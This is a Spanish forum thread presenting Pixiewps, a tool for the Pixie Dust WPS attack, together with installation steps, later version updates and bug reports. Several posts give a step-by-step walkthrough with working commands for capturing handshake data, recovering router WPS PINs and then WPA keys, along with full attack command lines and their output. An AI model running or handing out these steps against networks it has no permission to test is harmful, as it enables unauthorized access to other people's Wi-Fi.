El libre pensamiento para un internet libre

No estas registrado.  

#1 03-04-2015 16:56:14

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 5,730

Pixiewps de wiire : la herramienta para el novedoso ataque Pixie Dust.

Pixiewps by wiire : primera versión publica de la herramienta dedicada al ataque pixiedust....
... se avecina una tormenta
  • Nombre del programa :              Pixiewps

  • Autor :                                      wiire

  • Licencia :                                 GPL v3 (código libre)

  • Fecha de publicación :               03-abril-2015

  • Hilo oficial :                              Pixiewps: wps pixie dust attack tool ( Kali Linux Forum)

  • Repositorios oficiales :              wiire/pixiewps (Github)

  • Descripción:                             Pixiewps permite el brute force offline de los PIN WPS en los dispositivos con una entropía nula o débil (ataque pixie dust).
                                                   Todos los créditos para el descubrimiento de la brecha van a Domique Bogart

  • Lenguaje :                                C

  • Dependencias fundamentales :  aircrack-ng, reaver, gcc, lib.pcap0.8-dev...

  • Distribución :                            creado con y desarrollado para Kali linux

  • Registro de cambios              :  version 1.1 publicada el 01-05-2015
                                                        version 1.2.2 publicada el 04-01-2016
                                                        version 1.3 publicada el 07-10-2017   

       

Vídeo de demostración oficial (hecho por soxrok2212 )

Instalación

       
     

  Lo primero es descargar la herramienta. Lo podemos hacer desde nuestra consola así :

 wget https://github.com/wiire/pixiewps/archive/master.zip

  O desde nuestro navegador : wiire/pixiewps en GitHub
  Y descomprimirlo

unzip master.zip

  El resultado

Archive:  master.zip
1aea6eb634ef7d883bccff28695db57320c1040b
   creating: pixiewps-master/
  inflating: pixiewps-master/.gitattributes  
  inflating: pixiewps-master/README.md  
   creating: pixiewps-master/src/
  inflating: pixiewps-master/src/Makefile  
  inflating: pixiewps-master/src/pixiewps.c 

  Se nos ha creado una nueva carpeta "pixiewps-master" que contiene el fichero "readme" y que contiene otra carpeta, "src" dónde encontramos el código y el "makefile".

# INSTALLATION

Pixiewps can be built and installed by running:

```
    ~/pixiewps$ cd src
    ~/pixiewps/src$ make
    ~/pixiewps/src$ sudo make install
```

# USAGE

```
Usage: pixiewps <arguments>

Required Arguments:

    -e, --pke      : Enrollee public key
    -r, --pkr      : Registrar public key
    -s, --e-hash1  : E-Hash1
    -z, --e-hash2  : E-Hash2
    -a, --authkey  : Key used in HMAC SHA-256

Optional Arguments:

    -n, --e-nonce  : Enrollee nonce
    -S, --dh-small : Small Diffie-Hellman keys (--pkr not needed)

    -h, --help     : Display this usage screen

la instalación es simple y los argumentos son pocos : una herramienta muy fácil de uso smile

Serán necesarias algunas dependencias que no están incluidas por defecto en Kali
Actualizaremos primero nuestra lista de repositorios y nuestro sistema

sudo apt-get update && sudo apt-get upgrade

  Y instalamos las dependencias

sudo apt-get install libsqlite3-dev
sudo apt-get install libpcap-dev 
sudo apt-get install sqlite3

Al grano... : desde nuestra terminal, nos situamos en nuestro directorio src a dentro de la nueva carpeta "pixewps master"

cd pixiewps-master/src/

lanzamos la compilación :

make

Instalamos con

sudo make install


pixiewps.jpg

Y antes de lanzar el programa no olvidaros de atribuirle permisos por si las moscas wink

chmod 777 pixiewps

chmod +x  pixiewps

( en la misma terminal, siempre situados en "src")


Necesitamos también un reaver (o bully) modificado. La mejor opción es sin duda la mod de srocokx1121 que nos procuramos aquí :  Modified Reaver 1.5 (mediafire)*
Edit
Existe ahora reaver 1.5.2 con soporte pixie dust y está instalado por defecto en Kali Linux. Podéis actualizarlo (recomendado) así:

git clone https://github.com/rofl0r/reaver-wps-fork-t6x.git && cd reaver* && cd src && ./configure && make && sudo make install 

Con lo cual se pueden olvidar de las instrucciones que siguen (hasta "sudo make install")
  Una vez el reaver modificado descargado atribuimos los permisos necesarios al fichero de configuración de nuestro reaver modificado

chmod 755 '/reaver-wps-fork-read-only/src/configure'

Y podemos instalar... nos situamos

cd '/reaver-wps-fork-read-only/src/' 

lanzamos la compilación

./configure
make

Y instalamos

sudo make install

NB: La modificación de reaver es solo para "pillar" al vuelo algunos elementos procesados interiormente por reaver. No afecta lo mas mínimo el comportamiento de la herramienta en sí. No es necesario volver a instalar la versión "clásica" de reaver.

¡A pixie dustear!
Publicaré enseguida un segundo post con un ejemplo de uso. wink

Edit
Regalo de la casa:
Versión ya compilado para Windows por Patcher en respuesta #23


ejemplo de uso paso a paso en respuesta 5 de este hilo

Haz clic aquí para llegar directamente al mensaje#5.

Desconectado

#2 03-04-2015 18:02:08

atim
Very Important Usuario

Registrado: 15-03-2015
Mensajes: 189

Re: Pixiewps de wiire : la herramienta para el novedoso ataque Pixie Dust.

Estoy intentando instalarla en ubuntu pero me da error, no encuentra el directorio.
   Lo que hago basicamente es, despues de extraer me sitúo  dentro de la capeta src con "abrir terminal aqui" y copio y pego los codigos de instalación que bienen en el readme.

   Por cierto el video que has puesto de demostración lo han borrado.

Desconectado

#3 03-04-2015 18:14:29

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 5,730

Re: Pixiewps de wiire : la herramienta para el novedoso ataque Pixie Dust.

cuando tendre un momento hara un tutorial para ubuntu... historias de depoendencias.... tengo muchas cosas por hacer, en kali era necesario instalar   libsqlite3-dev y  libpcap-dev sqlite3...
estoy aun probando cosas bajo kali, cuando acabare vuelvo a mi xubuntu y te pondre la solución.(incluso a lo mejor hago un mini-tuto desde 0 en ubuntu"
tengo que hacer bastante cosas... ya nos vemos luego. wink
PD: el video se ha quitado un momento para mejorar la calidad ya que no era HD pero 480 ps.
se volvera a colocar enseguida cuando este renderizado
tengo pensado hacer uno en castellano también
tiempo, tiempo, ¿dónde puedo comprar tiempo? big_smile

Desconectado

#4 03-04-2015 18:23:04

atim
Very Important Usuario

Registrado: 15-03-2015
Mensajes: 189

Re: Pixiewps de wiire : la herramienta para el novedoso ataque Pixie Dust.

Muchas gracias por tus aclaraciones, seguro que cuando tengas tiempo  haces un buen manual con buenos graficos como nos tienes acostumbrados    smile

Desconectado

#5 03-04-2015 20:40:14

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 5,730

Re: Pixiewps de wiire : la herramienta para el novedoso ataque Pixie Dust.

Ejemplo de uso

Muy simple...
Tenemos ya a nuestro reaver mod instalado y a nuestro pixiewps en nuestro Kali linux

Activar mode monitor

Espero no aprenderlos algo nuevo big_smile
para detectar nuestra(s) interfaz(ces)

(sudo) airmon-zc

seguido de

(sudo) airmon-zc start <interfaz>

para activar el mode monitor

pixiewps2.jpg

Scan WPS con wash

Uso wash en el canal de mi punto de acceso

(sudo) wash -i wlan1mon -c 12 

pixiewps3.jpg

WPS abierto y operativo. Copiamos el bssid para pegar lo en nuestra linea de ordenes reaver.

Ataque con reaver mod para obtener las cadenas necesarias a pixiewps

Detallo los argumentos empleados en mi liña de orden

sudo reaver -i wlan1mon -b 00:A0:26:XX:XX:XX -g 1 -n -vv -S -c 12
  • -i wlan1mon : indicamos la interfaz en mode monitor

  • -g 1 : pedimos que reaver proba un solo PIN (no me funciono en la md, habrá que mirar esto)

  • -b blablabla : ponemos la dirección mac de nuestro router que hemos copiado antes porque somos listos

  • -n : siempre aconsejable cuando usamos reaver

  • -vv : "ful verbose" para tener un maximo de detalles en consola

  • -S  : va  hacer que vamos a usar llaves diffie hellman cortas lo que nos va ahorrar tener que entrar la PKR en pixiewps. Lo explico luego en el próximo paso

  • -c 12 :  indico el numero del canal de mi router

pixiewps4.jpg

El ataque se desarrollará y paramos con [CTRL+C] una vez que hemos mandado un PIN. Podemos en consola varias cadenas de hash que corresponden a los elementos que necesitamos para efectuar el ataque pixie dust.

pixiewps5.jpg

uso de pixiewps para obtener el PIN

Debemos estar situados en nuestro directorio "src" para lanzar pixiewps. Si llamaos pixiewps sin argumentos obtenemos la ayuda:

kcdtv@kali:~/Downloads/pixiewps-master/src$ ./pixiewps

Pixiewps made by wiire

Usage: pixiewps <arguments>

Required Arguments:

    -e, --pke      : Enrollee public key
    -r, --pkr      : Registrar public key
    -s, --e-hash1  : E-Hash1
    -z, --e-hash2  : E-Hash2
    -a, --authkey  : Key used in HMAC SHA-256

Optional Arguments:

    -n, --e-nonce  : Enrollee nonce
    -S, --dh-small : Small Diffie-Hellman keys (--pkr not needed)

    -h, --help     : Display this usage screen

  Notáis que para realizar el ataque necesitamos entrar 5 elementos : PKE, PKR, auh_key, EHASH1 y EAHS2
Pero como hemos empleado en reaver anteriormente el opción -S prescindiremos de entrar la PKR y podremos en lugar en nuestra linea pixiewps simplemente "-S"
entonces copiamos y pegamos los elementos de uno en uno:

pixiewps6.jpg

¡Y si obtenemos un PIN es el bueno! (sino no obtenemos nada)

pixiewps7.jpg

Ataque con reaver mod para obtener la llave WPA

simplemente añadimos el argumento -p con el PIN validó que hemos encontrado a la liña que hemos usado anteriormente (flecha arriba en consola para volver a ella)
Y lanzamos el ataque como de costumbre

pixiewps8.jpg

pixiewps9.jpg


voilà.

atim, no se si tendré tiempo de hacer el manual de instalación para ubuntu esta noche aún no he cocinado mi cena , mañana prometido lo tienes...
saludos

Desconectado

#6 03-04-2015 23:36:16

atim
Very Important Usuario

Registrado: 15-03-2015
Mensajes: 189

Re: Pixiewps de wiire : la herramienta para el novedoso ataque Pixie Dust.

  kcdtv     Hoy 20:40:14 escribió:

atim, no se si tendré tiempo de hacer el manual de instalación para ubuntu esta noche aún no he cocinado mi cena , mañana prometido lo tienes...

Ok, muchas gracias. Por cierto, esta herramienta sirve para los broadcom?

Desconectado

#7 03-04-2015 23:46:19

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 5,730

Re: Pixiewps de wiire : la herramienta para el novedoso ataque Pixie Dust.

Por supuesto. cool
Por esto la espera, había que codificar el broadcom wink
he abierto un tema para lo de instalrlo en ubuntu y he actualizado el primer post con el video re-subido
es mejor si ponéis la definición en HD 720, se ve borroso en 480.p
a ver este tema de hmac 256 en ubuntu roll Nos vemos ahí big_smile

Desconectado

#8 04-04-2015 02:05:15

atim
Very Important Usuario

Registrado: 15-03-2015
Mensajes: 189

Re: Pixiewps de wiire : la herramienta para el novedoso ataque Pixie Dust.

Acabo de hacerla funcionar, la he probado con un broadcom y ha sido negativo. Me ha puesto;

[-] WPS pin not found!

  Time taken: 0 s


   Entiendo que lo he hecho bien, pero que el roouter no es vulnerable.

Ultima edición por atim (04-04-2015 02:05:56)

Desconectado

#9 04-04-2015 22:37:05

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 5,730

Re: Pixiewps de wiire : la herramienta para el novedoso ataque Pixie Dust.

Buena noticia para wiire.
Es siempre agradable ver su trabajo reconocido
Hoy ha sido felicitado por Dominique Bongard en persona en twiter smile

twitt.jpg

twitter Dominique Bongard

@ atim Has bien entendido, si tienes esta pantalla es que lo has hecho bien pero el routeur no es vulnerable.
Si no lo haces bien te sale la ayuda en lugar de este mensajes o del PIN

Desconectado

#10 06-04-2015 11:10:40

1camaron1
Usuario

Registrado: 30-03-2015
Mensajes: 12

Re: Pixiewps de wiire : la herramienta para el novedoso ataque Pixie Dust.

Holas de nuevo smile ya me he instalado la herramienta bajo kali linux  sin ningún problema, el tuto es muy claro y sencillo, ahora toca hacer pruebas wink

Saludos!

Desconectado

#11 01-05-2015 22:06:40

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 5,730

Re: Pixiewps de wiire : la herramienta para el novedoso ataque Pixie Dust.

¡Pixiewps 1.1 esta publicada !
Caen los últimos dispositivos realteck con el novedoso brute force sobre semilla "tiempo"

¡Ya esta!
Wiire a oficialmente lanzado la primera "nueva versión" de pixiewps.
La podemos descargar y instalar como explicado en primer post.

  Unos cambios mayores intervienen y justifican una nueva versión.
Como les expliqué en este hilo : Pixie dust WPS : ¡Realtek ("rtl819x project") cae también!, gracias a la ayuda de Dominique Bongard, hemos averiguado en que relateck se basaba para definir la semilla empleada en el intercambio de llaves Diffie Hellmann.
unos routers realteck se pueden "crackear" inmediatamente ya que si mandamos el PIN en un segundo las cadenas secretas ES-1 y ES-2 son iguales al e-nounce (emitido en claro)
  En otros routers no es el caso.
La semilla empleada corresponde al "utlimo build" (la fecha exata del primer lanzamiento tras la instalación de un firmware)
  Por lo tanto debemos realizar un brute force de esta semilla,
Es decir ir comprobando segundo tras segundo el estado del PRNG
 
 

Pixiepws 1.1 integra esta opción que lanzaremos con el argumento "-f"
  Force Pixiewps to bruteforce the whole keyspace for mode 4.
        It could take up to several minutes to complete.

y en estas captura un ataque contra un nuevo dispositivo soportado usando la nueva opción -f



Con la nuevo opción  -m podremos entrar el registrar nonce que sale en los M

 -m, --r-nonce

        Registrar's nonce, found in M2.

Y con esto podremos tener sin necesidad de reaver mod  la "authkey" si hemos usado llaves diffie hellmann pequeñas.

wiire escribió:

- AuthKey computation if --dh-small is specified (also in Reaver). The data can be gathered from a .cap file (manually)

....a continuación podemos ver una captura de pantalla con un attaque pixie dust exitoso sin entrar el argumento -a + authkey
Giac0q8.png

y estas otras están hechas contra un totolink 301rt con el nuevo ataque "brute force semila"
1430562562.png

1430562605.png

1430562641.png

Desconectado

#12 03-05-2015 10:56:06

atim
Very Important Usuario

Registrado: 15-03-2015
Mensajes: 189

Re: Pixiewps de wiire : la herramienta para el novedoso ataque Pixie Dust.

Hola buenas;

   Para instalar esta nueva versión dices que hay que volver a repetir todos los pasos de igual forma?

   Lo digo porque lo he hecho así pero sigo con la misma versión que tenía, no se si habŕe hecho algo mal. Se sabe algúna mac nueva afectada por realtek ?

   Un saludo.

Desconectado

#13 03-05-2015 13:50:34

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 5,730

Re: Pixiewps de wiire : la herramienta para el novedoso ataque Pixie Dust.

No se que haces, lo suyo sería que pongas aqui los pasos que ha seguido...
El programa se instala muy bien encima de la antigua versión...
¿ A lo mejoir no te has situado en la carpeta src que contiene el makefile?

  1) descargar

wget https://github.com/wiire/pixiewps/archive/master.zip

2) descomprimir los ficheros

unzip pixiepws-master.zip

mirra que no tengas la antigua carpeta descomprimida en el mismo directorio que para la nueva para que no se mezclen
  3) situar se (en el directorio dónde tienes el "makefile" es decir :  /pixiewps-master/src )

cd /pixiewps-master/src

4) Compilar con make:

make

  5) y instalar (con derechos de administrador)

sudo make install

Selection_224.png

Desconectado

#14 03-05-2015 19:10:54

atim
Very Important Usuario

Registrado: 15-03-2015
Mensajes: 189

Re: Pixiewps de wiire : la herramienta para el novedoso ataque Pixie Dust.

Gracias, ahora estoy de viaje. En cuanto llegue a casa lo hago de nuevo y te cuento.

Desconectado

#15 14-01-2016 21:13:33

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 5,730

Re: Pixiewps de wiire : la herramienta para el novedoso ataque Pixie Dust.

Nuevo Pixiewps 1.2
¡ Para empezar 2016 con buen pie !

El amigo wiire ha publicado este 6 de enero una actualización de su herramienta para efectuar ataques "pixiedust" : pixiewps
(gracias a dk' por pegarnos el toque wink )

pixie_20.jpg

El programa lleva mejoras de código así que tres nuevas opciones.
Vamos a ver las enseguida...

1) Actualizar/instalar pixiewps 1.2

Para " actualizar" simplemente instalamos la nueva versión sobre la vieja...

  1. Descargar

     git clone https://github.com/wiire/pixiewps.git
  2. Situar la consola

    cd pixiewps/src
  3. Compilar

    make
  4. Instalar

    sudo make install
2) un código mejorado para un pixiewps más rápido

Wiire ha conseguido quitar una dependencia : OpenSSL
Gracias a sus códigos caseros  para generar los ashes pixiewps es ahora mucho mas rápido para encontrar los PIN.
con pixiewps 1.1 hacía un brute force sobre un año en 6 minutos.
Con el nuevo pixiewps 1.2 mi brute force completo sobre 3 años ha tomado tres minutos...

pixiewps_21.jpg

¡ Pixiewps 1.2 es tres veces más rápido que pixiewps 1.1
3) "3" como tres nuevas opciones

Estas son las tres ocpiones

   --mode N[,... N]  : Mode selection, comma separated           [Auto]
   --start [mm/]yyyy : Starting date (only mode 3)       [Current time]
   --end   [mm/]yyyy : Ending date   (only mode 3)            [-3 days]
  1. --mode N[,... N]  : Mode selection, comma separated 

    con mode slection podemos definir el método de crack empleado. el modo 1 corresponde a ralink (ES1 y ES2 = 0 ), el modo 2 corresponde a broadcom (intervalo de semilla conocido) y el modo 3 es oara realteck (brute force tiempo sobre la semila )   

  2.   --start [mm/]yyyy : Starting date (only mode 3)       [Current time]

    Nos permite definir con que fecha empieza el brute force cuando se trata de chipset realteck. por defecto se usa la fecha del día presente

  3.    --end   [mm/]yyyy : Ending date   (only mode 3)            [-3 days]
    nos permite definir cuando parrar el brute force. (por defecto volvemos tres días atrás la fecha de hoy[/*]

ilustración :
voy a atacar mi routeur que salió en agosto 2012 para el cual tres minutos de brute force han sido necesarios
Para hacer un brute force sobre el mes que me interesa (agosto 2012) debo añadir estos argumentos a mi linea pixiewps

--start 08/2012 --end 09/2012

pixie_23.jpg

El mismo router crackeado en tres segundos en lugar de tres minutos gracias a las nuevas opciones

Desconectado

#16 01-11-2016 02:04:42

Patcher
waircut

Registrado: 14-01-2016
Mensajes: 656

Re: Pixiewps de wiire : la herramienta para el novedoso ataque Pixie Dust.

Estos días he avanzado un poco en mi objetivo y ya he conseguido obtener el AuthKey. Salvo que me equivoque esta es la primera implementación documentada de la automatización del procedimiento PixieDust bajo el sistema operativo windows:

PixieDust_Windows_Edited.png

Bajo windows yo no lo he visto en ninguna parte, y vosotros ¿lo habéis visto en algún sitio?.

Desconectado

#17 14-11-2016 17:47:24

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 5,730

Re: Pixiewps de wiire : la herramienta para el novedoso ataque Pixie Dust.

comunicado
Por problemas de plagiado (ai, ai : Es un mundo cruel ahí afuera) se ha decidido crear un hilo aparte sobre el trabajo del Pacher para darle todo la visibilidad que se merece.
  Si quieres informarte sobre la implementación completa de los tres ataques Pixie Dust conocidos en Windows; te invitamos a leer este hilo:

  ¿Pixie WPS en Windows completo y sin fallos?
....Parece que aa a ser que si... cool
   ¡Buena lectura!
  Podrás decir a tus niet@s:
    - "¿Sabéis que yo he visto en 2016 el vidéo original pixie dust en windows? Eran otros tiempos... Eramos jóvenes y guapos... unos pioneros del wifi..."
  Probablemente te responderán:
   - "¡Otra vez con el puto pixe dust WPS en windows! Son las 8 de la mañana ya ya nos ha contado tres veces esta historia que nos cuentas cada vez que te hacemos una visita"
   Al cúal podrás responder:
  - "Tsssssssss... Me importa un pimiento mocosos babosos y tendréis que escuchar la historia las veces que haga falta si queréis tocar algo de la herencia...  Hoy en día no hay respeto... "

Cierro esta paréntesis (antes de ello un pequeño "¡Enhorabuena campeón!" @ Parcher wink )  y seguimos en este hilo hablando del pixiewps del amigo wiire  smile

Desconectado

#18 28-11-2016 22:32:35

Patcher
waircut

Registrado: 14-01-2016
Mensajes: 656

Re: Pixiewps de wiire : la herramienta para el novedoso ataque Pixie Dust.

Estaba haciendo pruebas con un router de vodafone y me he dado cuenta de lo siguiente:

Vodafone88.png

Fijaros en el resultado de PixieWps

[!] The AP /might be/ vulnerable. Try again with --force or with another (newer) set of data.

He vuelto a lanzar pixiewps, esta vez con el parametro "-f" como sugiere el mensaje, pero el proceso se vuelve interminable y despues de una hora lo he detenido.

He de decir tambien que en este hilo no he visto que se haga mención a tal parametro y el help de la versión 1.2 del pixiewps que estoy empleando no lo muestra como tal

Pixiewps 1.2 WPS pixie dust attack tool
 Copyright (c) 2015-2016, wiire <wi7ire@gmail.com>

 Usage: pixiewps.exe <arguments>

 Required Arguments:

   -e, --pke         : Enrollee public key
   -r, --pkr         : Registrar public key
   -s, --e-hash1     : Enrollee hash-1
   -z, --e-hash2     : Enrollee hash-2
   -a, --authkey     : Authentication session key
   -n, --e-nonce     : Enrollee nonce

 Optional Arguments:

   -m, --r-nonce     : Registrar nonce
   -b, --e-bssid     : Enrollee BSSID
   -S, --dh-small    : Small Diffie-Hellman keys (PKr not needed)  [No]
   -v, --verbosity   : Verbosity level 1-3, 1 is quietest           [3]

   -h                : Display this usage screen
   --help            : Verbose help and more usage examples
   -V, --version     : Displays version

   --mode N[,... N]  : Mode selection, comma separated           [Auto]
   --start [mm/]yyyy : Starting date (only mode 3)       [Current time]
   --end   [mm/]yyyy : Ending date   (only mode 3)            [-3 days]

 Example:

 pixiewps -e <pke> -r <pkr> -s <e-hash1> -z <e-hash2> -a <authkey> -n <e-nonce>

¿Sabeis algo acerca de este parametro "--force"?

Por otro lado normalmente estoy lanzado pixiewps solamente con los parametros requerido:

 Required Arguments:

    -e, --pke      : Enrollee public key
    -r, --pkr      : Registrar public key
    -s, --e-hash1  : E-Hash1
    -z, --e-hash2  : E-Hash2
    -a, --authkey  : Key used in HMAC SHA-25

Así que siguiendo la magistral guia de Kcdtv

Kcdtv escribió:
--mode N[,... N]  : Mode selection, comma separated 

con mode slection podemos definir el método de crack empleado. el modo 1 corresponde a ralink (ES1 y ES2 = 0 ), el modo 2 corresponde a broadcom (intervalo de semilla conocido) y el modo 3 es oara realteck (brute force tiempo sobre la semila )

he probado a indicarle tambien el tipo de modo, el 1 en este caso:

pixiewps.exe -a 4D:CF:13:50:70:20:0C:A3:CE:
83:DE:B5:65:3C:F4:E1:F8:AB:31:FA:56:C8:34:49:54:7D:14:79:9B:9B:AE:5C -e DF:65:62
:BD:1B:E6:29:89:85:91:4C:25:3A:61:20:E2:5E:DC:F8:BE:36:6A:30:1C:0E:C5:54:A8:2A:9
4:D2:83:A1:D6:4E:D4:9A:35:C2:57:5C:87:4D:D4:39:34:9F:83:E3:B9:79:34:21:07:E1:91:
31:B5:A9:4D:36:60:DD:99:0A:EB:00:28:8F:79:E4:FA:46:9E:74:94:2B:36:B1:05:B6:29:98
:E1:8D:B6:C0:04:5D:B5:77:45:6F:9E:C2:69:5D:C7:F6:39:C8:CC:77:40:D1:85:A3:A8:A2:6
D:F0:53:D8:A7:41:9D:C0:56:83:9A:CA:F4:D8:2A:EB:CA:DE:E3:6A:EE:99:89:29:DD:5B:DC:
57:DD:F7:08:EA:19:74:68:66:D1:08:E3:E8:5D:1F:C0:12:CF:83:AE:70:21:FF:6C:54:DA:09
:71:EB:2B:79:58:4B:A3:E0:8D:31:3C:AB:13:15:A0:1E:D7:FD:A4:94:B8:BD:B4:CE:5A:CA:E
7:66:10 -r 3A:56:6C:E7:E4:C6:C0:ED:E8:D6:06:87:E7:09:DB:48:0D:9E:B1:0F:A4:A1:BE:
F1:4D:17:05:51:41:14:80:47:0E:7A:AB:9D:6E:E4:52:91:63:E0:E2:31:C9:6A:17:95:15:D2
:28:D7:48:A9:D3:AB:D0:93:0E:C1:50:79:3A:60:26:0C:9C:2B:74:B1:FB:6B:37:3B:BD:07:F
8:ED:D9:C7:C9:F8:14:A0:6B:C1:1D:97:BC:25:3B:64:2F:0B:0C:2A:31:72:4B:BB:40:C4:A4:
E4:89:21:E8:40:06:2D:DB:B2:0A:77:A7:7A:6F:50:5A:35:5E:E4:26:55:E5:C5:01:89:1B:87
:44:57:63:03:4A:B4:41:EB:F7:DA:CD:EF:CF:D6:44:E2:7F:34:46:74:1A:08:84:9C:DF:85:6
7:AE:7E:A7:73:55:3C:C7:DA:6D:7E:39:60:D7:D8:5A:CA:E2:29:D9:79:F0:F7:E0:60:6D:74:
41:FC:8E:8A:CB:26:DE:E4:D3 -s A0:5B:C1:93:91:B5:6F:A8:11:6A:05:28:27:46:0E:E3:56
:D4:00:79:E0:AC:A3:75:53:24:3E:3C:30:7C:7D:51 -z E7:5C:79:62:46:EB:5E:4D:13:E8:0
E:03:F9:63:A9:B5:0F:C8:85:F6:8C:5F:12:46:EB:98:0B:2B:34:46:F9:F7 -n 14:6E:99:9D:
7E:3B:F8:BE:14:78:51:76:06:47:A9:55 --mode 1

 Pixiewps 1.2

 [*] Mode:       1 (RT/MT)
 [*] PSK1:       d6:8b:14:d2:d2:ad:24:be:50:54:d0:e8:b8:d1:80:f5
 [*] PSK2:       36:50:dd:ec:ba:16:49:60:c6:43:3a:87:e7:27:40:9a
 [*] E-S1:       00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
 [*] E-S2:       00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
 [+] WPS pin:    25976823

 [*] Time taken: 0 s 62 ms

Ahora sí que ha encontrado el PIN. Por lo que saco la conclusión de que es mejor indicar este campo en lugar de dejarlo en modo automático. ¿Que opinais?, ¿Ha de hacerse así?, ¿Es fiable el modo automático?.

Desconectado

#19 29-11-2016 01:56:13

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 5,730

Re: Pixiewps de wiire : la herramienta para el novedoso ataque Pixie Dust.

Buenas noches.
Interesante smile
Es la primera vez que veo un fail sobre ralink.
¿Puedes probar indicando la nounce y sin indicar el modo ralink (1)?
Sobre la opción --force ha desaparecido y es porque pixiewps detecta la PKE fija realtek y lanzará el brute force completo automáticamente si no se encutra con el inetrvalo reucido
Lo que ha motivado este cambio es también que pixiewps es mucho mas eficiente y que el ataque completo se hace en unos minutos en lugar de 20 o más.
Con lo cúal no molestará mucho el usuario...
Con el tuyo hast probablemente vuelto hacía 1970 que es el limite y faltará al codigó unas instrucciones para cerrar en modo error, 
Intentare hablar con wire pero no se deja ver mucho últimamente...
Pienso que el modo automático es fiable dando todos los datos (incluyendo la nounce) o esto me parecía...

Desconectado

#20 29-11-2016 12:28:30

Betis-Jesus
Very Important Usuario

Registrado: 29-03-2015
Mensajes: 556
Página Web

Re: Pixiewps de wiire : la herramienta para el novedoso ataque Pixie Dust.

el modo automatico funciona asi la mayoria de la veces con los paramentro requerido pero estaria bien tener el modo manual, para proposito de prueba donde el modo automatico puede falla en cierto encenario.


viver y ser libre

Desconectado

#21 30-11-2016 00:35:06

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 5,730

Re: Pixiewps de wiire : la herramienta para el novedoso ataque Pixie Dust.

Es un bug con la ultima revisión-
El PIN sale con la 1.2 sin tener que especificar el modo de ataque.
He escrito a wire para que lo arregle.
¡Gracias Patcher!
Cazador de trolls y de bugs... big_smile

Desconectado

#22 12-02-2017 14:06:55

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 5,730

Re: Pixiewps de wiire : la herramienta para el novedoso ataque Pixie Dust.

Ayer salió un nueva revisión de pixiepws y se ha arreglado el bug encontrado por Patcher .

pixiewps_update_ferbero2017_2.jpg

Acabo de probarla con los datos "rebeldes":

pixiewps_update_ferbero2017.jpg

Pixiewps encuentra automáticamente le PIN en menos de un segundo sin que tengamos que indicar el modo. cool
Saludos y gracias desde aquí al maestro wiire. smile

Desconectado

#23 12-02-2017 16:47:07

Patcher
waircut

Registrado: 14-01-2016
Mensajes: 656

Re: Pixiewps de wiire : la herramienta para el novedoso ataque Pixie Dust.

Buena noticia, la estaba esperando.

pixiewps.exe -a 4D:CF:13:50:70:20:0C:A3:CE:
83:DE:B5:65:3C:F4:E1:F8:AB:31:FA:56:C8:34:49:54:7D:14:79:9B:9B:AE:5C -e DF:65:62
:BD:1B:E6:29:89:85:91:4C:25:3A:61:20:E2:5E:DC:F8:BE:36:6A:30:1C:0E:C5:54:A8:2A:9
4:D2:83:A1:D6:4E:D4:9A:35:C2:57:5C:87:4D:D4:39:34:9F:83:E3:B9:79:34:21:07:E1:91:
31:B5:A9:4D:36:60:DD:99:0A:EB:00:28:8F:79:E4:FA:46:9E:74:94:2B:36:B1:05:B6:29:98
:E1:8D:B6:C0:04:5D:B5:77:45:6F:9E:C2:69:5D:C7:F6:39:C8:CC:77:40:D1:85:A3:A8:A2:6
D:F0:53:D8:A7:41:9D:C0:56:83:9A:CA:F4:D8:2A:EB:CA:DE:E3:6A:EE:99:89:29:DD:5B:DC:
57:DD:F7:08:EA:19:74:68:66:D1:08:E3:E8:5D:1F:C0:12:CF:83:AE:70:21:FF:6C:54:DA:09
:71:EB:2B:79:58:4B:A3:E0:8D:31:3C:AB:13:15:A0:1E:D7:FD:A4:94:B8:BD:B4:CE:5A:CA:E
7:66:10 -r 3A:56:6C:E7:E4:C6:C0:ED:E8:D6:06:87:E7:09:DB:48:0D:9E:B1:0F:A4:A1:BE:
F1:4D:17:05:51:41:14:80:47:0E:7A:AB:9D:6E:E4:52:91:63:E0:E2:31:C9:6A:17:95:15:D2
:28:D7:48:A9:D3:AB:D0:93:0E:C1:50:79:3A:60:26:0C:9C:2B:74:B1:FB:6B:37:3B:BD:07:F
8:ED:D9:C7:C9:F8:14:A0:6B:C1:1D:97:BC:25:3B:64:2F:0B:0C:2A:31:72:4B:BB:40:C4:A4:
E4:89:21:E8:40:06:2D:DB:B2:0A:77:A7:7A:6F:50:5A:35:5E:E4:26:55:E5:C5:01:89:1B:87
:44:57:63:03:4A:B4:41:EB:F7:DA:CD:EF:CF:D6:44:E2:7F:34:46:74:1A:08:84:9C:DF:85:6
7:AE:7E:A7:73:55:3C:C7:DA:6D:7E:39:60:D7:D8:5A:CA:E2:29:D9:79:F0:F7:E0:60:6D:74:
41:FC:8E:8A:CB:26:DE:E4:D3 -s A0:5B:C1:93:91:B5:6F:A8:11:6A:05:28:27:46:0E:E3:56
:D4:00:79:E0:AC:A3:75:53:24:3E:3C:30:7C:7D:51 -z E7:5C:79:62:46:EB:5E:4D:13:E8:0
E:03:F9:63:A9:B5:0F:C8:85:F6:8C:5F:12:46:EB:98:0B:2B:34:46:F9:F7 -n 14:6E:99:9D:
7E:3B:F8:BE:14:78:51:76:06:47:A9:55

 Pixiewps 1.2

 [*] Mode:       1 (RT/MT)
 [*] PSK1:       d6:8b:14:d2:d2:ad:24:be:50:54:d0:e8:b8:d1:80:f5
 [*] PSK2:       36:50:dd:ec:ba:16:49:60:c6:43:3a:87:e7:27:40:9a
 [*] E-S1:       00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
 [*] E-S2:       00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
 [+] WPS pin:    25976823

 [*] Time taken: 0 s 45 ms

Ahora si, rápido y sin necesidad de indicar el modo. Perfecto!!. Desde aquí también mi agradecimiento a Wiire.

